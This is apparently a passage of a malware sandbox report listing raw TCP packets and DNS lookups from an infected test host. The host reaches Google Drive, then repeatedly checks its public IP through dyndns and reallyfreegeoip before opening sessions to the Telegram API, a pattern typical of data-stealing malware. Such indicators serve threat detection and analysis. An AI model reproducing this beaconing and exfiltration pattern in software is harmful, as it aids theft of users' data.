                                                                                                                  Jan 10, 2025 22:40:13.805990934 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.806031942 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.806037903 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.806051016 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.806091070 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.815630913 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.815649986 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:15.741568089 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:15.746429920 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:15.746527910 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:15.746716976 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:15.751537085 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:20.434643030 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:20.443990946 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:20.448875904 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:21.404453993 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:21.452270985 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:21.755654097 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:21.755667925 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:21.755732059 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:21.757922888 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:21.757936001 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.257549047 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.257664919 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:22.261410952 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:22.261444092 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.261945963 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.272665024 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:22.315344095 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.393043995 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.393222094 CET44349988104.21.32.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:22.393306017 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:22.403871059 CET49988443192.168.2.6104.21.32.1
                                                                                                                  Jan 10, 2025 22:40:28.107544899 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:28.112565041 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:29.391491890 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:29.421226978 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:29.421271086 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:29.421487093 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:29.422013998 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:29.422029972 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:29.437077045 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.048665047 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.048793077 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.056190968 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.056222916 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.057377100 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.059073925 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.099334002 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.099468946 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.099486113 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.359110117 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.359246016 CET44349989149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.359309912 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.359713078 CET49989443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:30.516865969 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.518309116 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.522072077 CET8049987132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.522161007 CET4998780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.523232937 CET8049990132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:30.523333073 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.523483038 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:30.528311968 CET8049990132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.318481922 CET8049990132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.320321083 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:31.320446968 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.320550919 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:31.321259022 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:31.321300030 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.358603001 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:31.938594103 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.944051981 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:31.944092989 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:31.946144104 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:31.946171045 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.242505074 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.242609024 CET44349991149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.242700100 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:32.243132114 CET49991443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:32.284882069 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:32.285923958 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:32.290061951 CET8049990132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.290154934 CET4999080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:32.290867090 CET8049992132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.290968895 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:32.291057110 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:32.295869112 CET8049992132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.964500904 CET8049992132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.970120907 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:32.970240116 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:32.970330000 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:32.970719099 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:32.970746040 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.014815092 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.602495909 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.604589939 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:33.604598999 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.604669094 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:33.604676008 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.909293890 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.909394979 CET44349993149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.909472942 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:33.910010099 CET49993443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:33.913670063 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.914948940 CET4999480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.918626070 CET8049992132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.919255972 CET4999280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.919742107 CET8049994132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:33.921897888 CET4999480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.922043085 CET4999480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:33.926759005 CET8049994132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:35.593790054 CET8049994132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:35.594965935 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:35.595014095 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:35.595117092 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:35.595381021 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:35.595396042 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:35.639977932 CET4999480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:36.202336073 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.204233885 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:36.204269886 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.204329967 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:36.204340935 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.422075987 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.422293901 CET44349995149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.422374010 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:36.422727108 CET49995443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:36.427902937 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:36.433516979 CET8049996132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:36.433675051 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:36.433839083 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:36.438676119 CET8049996132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.105823994 CET8049996132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.107094049 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:38.107165098 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.107356071 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:38.107690096 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:38.107706070 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.155483007 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:38.710661888 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.712208033 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:38.712220907 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:38.712261915 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:38.712272882 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:39.076515913 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:39.076626062 CET44349997149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:39.076796055 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:39.077132940 CET49997443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:39.080148935 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:39.081170082 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:39.085148096 CET8049996132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:39.085378885 CET4999680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:39.085988045 CET8049999132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:39.086062908 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:39.086287022 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:39.091294050 CET8049999132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:40.552428961 CET8049999132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:40.553649902 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:40.553703070 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:40.553770065 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:40.554028034 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:40.554044008 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:40.592936993 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.187124014 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.188714027 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:41.188744068 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.188805103 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:41.188828945 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.661540985 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.661640882 CET44350000149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.661748886 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:41.662055016 CET50000443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:41.665340900 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.666419983 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.670299053 CET8049999132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.670356035 CET4999980192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.671190977 CET8050001132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:41.671252966 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.671372890 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:41.676131010 CET8050001132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:45.343734026 CET8050001132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:45.358093977 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:45.363101006 CET8050002132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:45.363269091 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:45.363451958 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:45.368298054 CET8050002132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:45.389808893 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:48.248415947 CET8050002132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.248905897 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:48.253946066 CET8050001132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.254009962 CET5000180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:48.256892920 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:48.256959915 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.257049084 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:48.257359982 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:48.257400036 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.296058893 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:48.898999929 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.900721073 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:48.900793076 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.900867939 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:48.900892019 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:49.269857883 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:49.269973040 CET44350003149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:49.270114899 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:49.270503044 CET50003443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:49.273303032 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:49.274343967 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:49.278721094 CET8050002132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:49.278846979 CET5000280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:49.279591084 CET8050004132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:49.279663086 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:49.279896975 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:49.285126925 CET8050004132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:52.951751947 CET8050004132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:52.957674980 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:52.962452888 CET8050005132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:52.962559938 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:52.962630987 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:52.967406034 CET8050005132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:52.999207973 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:57.146275997 CET8050005132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.146706104 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:57.147630930 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:57.147655964 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.147732019 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:57.148099899 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:57.148114920 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.151695967 CET8050004132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.151757956 CET5000480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:57.186687946 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:57.769898891 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.771889925 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:57.771912098 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:57.771974087 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:57.771982908 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:58.055139065 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:58.055344105 CET44350006149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:58.055413008 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:58.059149981 CET50006443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:40:58.115720987 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:58.120943069 CET8050005132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:58.121041059 CET5000580192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:58.129784107 CET5000780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:58.134653091 CET8050007132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:58.134788036 CET5000780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:58.139220953 CET5000780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:40:58.144105911 CET8050007132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:02.228669882 CET8050007132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:02.280441999 CET5000780192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 22:41:04.282990932 CET50008443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:41:04.283044100 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:04.283113003 CET50008443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:41:04.283461094 CET50008443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:41:04.283478975 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:04.894202948 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:04.895904064 CET50008443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:41:04.895936012 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:04.895987988 CET50008443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 22:41:04.895994902 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:05.200500011 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:05.200714111 CET44350008149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 22:41:05.200778961 CET50008443192.168.2.6149.154.167.220
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 22:40:09.298219919 CET5126653192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:09.305131912 CET53512661.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.406002045 CET5139453192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:10.413100958 CET53513941.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:15.729190111 CET6234453192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET53623441.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:21.747884989 CET5284653192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET53528461.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:29.413621902 CET5116053192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:29.420383930 CET53511601.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:48.249629021 CET6516453192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 22:40:48.256239891 CET53651641.1.1.1192.168.2.6
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 22:40:09.298219919 CET192.168.2.61.1.1.10x5e7bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:10.406002045 CET192.168.2.61.1.1.10xf136Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.729190111 CET192.168.2.61.1.1.10xee49Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.747884989 CET192.168.2.61.1.1.10x942aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:29.413621902 CET192.168.2.61.1.1.10x3602Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:48.249629021 CET192.168.2.61.1.1.10xd431Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 22:40:09.305131912 CET1.1.1.1192.168.2.60x5e7bNo error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:10.413100958 CET1.1.1.1192.168.2.60xf136No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:15.736776114 CET1.1.1.1192.168.2.60xee49No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 22:40:21.754991055 CET1.1.1.1192.168.2.60x942aNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
